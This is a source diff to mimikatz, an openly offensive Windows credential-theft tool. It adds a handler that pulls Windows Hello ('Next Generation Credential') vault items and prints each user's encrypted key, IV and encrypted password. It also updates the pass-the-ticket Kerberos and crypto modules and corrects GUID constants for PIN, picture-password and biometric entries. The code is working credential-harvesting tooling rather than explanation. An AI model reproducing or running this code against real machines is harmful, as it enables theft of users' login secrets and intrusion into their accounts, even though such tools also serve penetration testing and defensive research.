[new] ngc::pin for software keys, ngc::decrypt for passwords, etc.

mimikatz/modules/kerberos/kuhl_m_kerberos.c

@@ -63,7 +63,7 @@ NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[])
 		if(PathIsDirectory(argv[i]))
 		{
 			kprintf(L"* Directory: \'%s\'\n", argv[i]);
-			kull_m_file_Find(argv[i], L"*.kirbi", FALSE, 0, FALSE, kuhl_m_kerberos_ptt_directory, NULL);
+			kull_m_file_Find(argv[i], L"*.kirbi", FALSE, 0, FALSE, FALSE, kuhl_m_kerberos_ptt_directory, NULL);
 		}
 		else kuhl_m_kerberos_ptt_directory(0, argv[i], PathFindFileName(argv[i]), NULL);
 	}

mimikatz/modules/kuhl_m_crypto.c

@@ -928,7 +928,7 @@ NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[])
 		if(PathIsDirectory(infile))
 		{
 			kprintf(L"* Directory: \'%s\'\n", infile);
-			kull_m_file_Find(infile, NULL, FALSE, 0, FALSE, kuhl_m_crypto_system_directory, &isExport);
+			kull_m_file_Find(infile, NULL, FALSE, 0, FALSE, FALSE, kuhl_m_crypto_system_directory, &isExport);
 		}
 		else kuhl_m_crypto_system_directory(0, infile, PathFindFileName(infile), &isExport);
 	}

mimikatz/modules/kuhl_m_vault.c

@@ -61,7 +61,7 @@ const VAULT_SCHEMA_HELPER schemaHelper[] = {
 	{{{0xb2e033f5, 0x5fde, 0x450d, {0xa1, 0xbd, 0x37, 0x91, 0xf4, 0x65, 0x72, 0x0c}}, L"Pin Logon"},			kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric},
 	{{{0xb4b8a12b, 0x183d, 0x4908, {0x95, 0x59, 0xbd, 0x8b, 0xce, 0x72, 0xb5, 0x8a}}, L"Picture Password"},	kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric},
 	{{{0xfec87291, 0x14f6, 0x40b6, {0xbd, 0x98, 0x7f, 0xf2, 0x45, 0x98, 0x6b, 0x26}}, L"Biometric"},			kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric},
-	{{{0x1d4350a3, 0x330d, 0x4af9, {0xb3, 0xff, 0xa9, 0x27, 0xa4, 0x59, 0x98, 0xac}}, L"Next Generation Credential"},	NULL},
+	{{{0x1d4350a3, 0x330d, 0x4af9, {0xb3, 0xff, 0xa9, 0x27, 0xa4, 0x59, 0x98, 0xac}}, L"Next Generation Credential"},	kuhl_m_vault_list_descItem_ngc},
 };
 
 NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
@@ -196,13 +196,13 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
 	if(enumItem8->Identity && (enumItem8->Identity->Type == ElementType_ByteArray))
 	{
 		kprintf(L"\t\tUser            : ");
+		kull_m_string_displaySID((PSID) enumItem8->Identity->data.ByteArray.Value);
 		if(kull_m_token_getNameDomainFromSID((PSID) enumItem8->Identity->data.ByteArray.Value, &name, &domain, NULL, NULL))
 		{
-			kprintf(L"%s\\%s", domain, name);
+			kprintf(L" (%s\\%s)", domain, name);
 			LocalFree(name);
 			LocalFree(domain);
 		}
-		else kull_m_string_displaySID((PSID) enumItem8->Identity->data.ByteArray.Value);
 		kprintf(L"\n");
 
 		if(pGuidString->guid.Data1 == 0x0b4b8a12b)
@@ -257,11 +257,11 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
 	{
 		switch(pGuidString->guid.Data1)
 		{
-		case 0x0b2e033f5:	// pin
+		case 0xb2e033f5:	// pin
 			if((enumItem8->Properties + 0)->Type == ElementType_UnsignedShort)
 				kprintf(L"\t\tPIN Code        : %04hu\n", (enumItem8->Properties + 0)->data.UnsignedShort);
 			break;
-		case 0x0b4b8a12b:	// picture
+		case 0xb4b8a12b:	// picture
 			if((enumItem8->Properties + 0)->Type == ElementType_ByteArray)
 			{
 				pElements = (PVAULT_PICTURE_PASSWORD_ELEMENT) (enumItem8->Properties + 0)->data.ByteArray.Value;
@@ -293,7 +293,7 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
 				}
 			}
 			break;
-		case 0x0fec87291:	// biometric
+		case 0xfec87291:	// biometric
 			if((enumItem8->Properties + 0)->Type == ElementType_ByteArray)
 			{
 				bElements = (PVAULT_BIOMETRIC_ELEMENT) (enumItem8->Properties + 0)->data.ByteArray.Value;
@@ -312,6 +312,41 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
 	}
 }
 
+void CALLBACK kuhl_m_vault_list_descItem_ngc(const VAULT_GUID_STRING * pGuidString, PVOID enumItem, PVOID getItem, BOOL is8)
+{
+	PVAULT_ITEM_8 enumItem8 = (PVAULT_ITEM_8) enumItem, getItem8 = (PVAULT_ITEM_8) getItem;
+	PWSTR name, domain;
+	PKIWI_NGC_CREDENTIAL pNgcCred;
+
+	if(enumItem8->Identity && (enumItem8->Identity->Type == ElementType_ByteArray))
+	{
+		kprintf(L"\t\tUser            : ");
+		kull_m_string_displaySID((PSID) enumItem8->Identity->data.ByteArray.Value);
+		if(kull_m_token_getNameDomainFromSID((PSID) enumItem8->Identity->data.ByteArray.Value, &name, &domain, NULL, NULL))
+		{
+			kprintf(L" (%s\\%s)", domain, name);
+			LocalFree(name);
+			LocalFree(domain);
+		}
+		kprintf(L"\n");
+	}
+
+	if(getItem8 && getItem8->Authenticator && (getItem8->Authenticator->Type == ElementType_ByteArray))
+	{
+		if(pNgcCred = (PKIWI_NGC_CREDENTIAL) getItem8->Authenticator->data.ByteArray.Value)
+		{
+			kprintf(L"\t\tEncKey          : ");
+			kull_m_string_wprintf_hex(pNgcCred->Data, pNgcCred->cbEncryptedKey, 0);
+			kprintf(L"\n\t\tIV              : ");
+			kull_m_string_wprintf_hex(pNgcCred->Data + pNgcCred->cbEncryptedKey, pNgcCred->cbIV, 0);
+			kprintf(L"\n\t\tEncPassword     : ");
+			kull_m_string_wprintf_hex(pNgcCred->Data + pNgcCred->cbEncryptedKey + pNgcCred->cbIV, pNgcCred->cbEncryptedPassword, 0);
+			kprintf(L"\n");
+		}
+	}
+}
+
+
 void kuhl_m_vault_list_descVault(HANDLE hVault)
 {
 	VAULT_INFORMATION information;

mimikatz/modules/kuhl_m_vault.h

@@ -9,6 +9,7 @@
 #include "../modules/kull_m_token.h"
 #include "../modules/kull_m_patch.h"
 #include "../modules/kull_m_cred.h"
+#include "../modules/kull_m_crypto_ngc.h"
 
 const KUHL_M kuhl_m_vault;
 
@@ -27,6 +28,7 @@ typedef struct _VAULT_GUID_STRING {
 } VAULT_GUID_STRING, *PVAULT_GUID_STRING;
 
 void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(const VAULT_GUID_STRING * pGuidString, PVOID enumItem, PVOID getItem, BOOL is8); 
+void CALLBACK kuhl_m_vault_list_descItem_ngc(const VAULT_GUID_STRING * pGuidString, PVOID enumItem, PVOID getItem, BOOL is8);
 typedef void (CALLBACK * PSCHEMA_HELPER_FUNC) (const VAULT_GUID_STRING * pGuidString, PVOID enumItem, PVOID getItem, BOOL is8);
 
 typedef struct _VAULT_SCHEMA_HELPER {